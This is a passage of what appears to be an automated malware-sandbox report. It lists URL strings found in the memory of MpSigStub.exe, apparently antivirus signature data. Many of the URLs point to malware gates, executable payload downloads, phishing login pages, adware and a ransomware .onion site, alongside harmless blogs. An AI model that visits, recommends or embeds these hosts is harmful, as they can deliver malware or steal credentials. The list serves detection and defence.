Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://adsgo.zh-cn.cc/?
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://adult-analsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://adult-fetishismsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://adv-inc-net.com/trackingcode/tracker.html
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://advadmin.biz/tasks
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://agentwarderprotector.info/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://ago2.co.kr/bbs/data/dir/note.png
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://aklick.info/d.php?date=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://aksoni.myjino.ru/pn-g/xls.html)
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://al-tasmem.ga/doc/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000024.00000003.6329226003.00000197A33A2000.00000004.00000001.sdmp String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://alrozaviation.com/oj
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.tech/
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.win/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://animator.fetishismadultmovegal.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://ankarahurdacim.com/wp-admin/3yk1/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://anxw.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/xM
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://api.mswordexploit.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://apollo.thetheme99.com/wp-content/plugins/rrrrutd/mter/azure2020/azure2020/realm/117-crl.html
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://apy4.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://archifaktura.hu/nfxdutl.html
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://asedownloadgate.com/safe_download/582369/AdsShow.exeg
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://ashevillefusion.com/obngakydblpj
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://auglaizeseniorservices.com/lombrdia/lomardia.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://auto-klad.ru/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/g
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://autocostamecanica.com.br
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://autoescrowpay.com/s.php2
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://autoescrowpay.com/s.php2(MJV:%d
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://avocat.com.br/imt/su/index.html
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6275493852.0000019790C39000.00000004.00000001.sdmp String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://beef.smmovefilehost.com/pc/page/set_reg.php?afc=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://bellasimpson.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
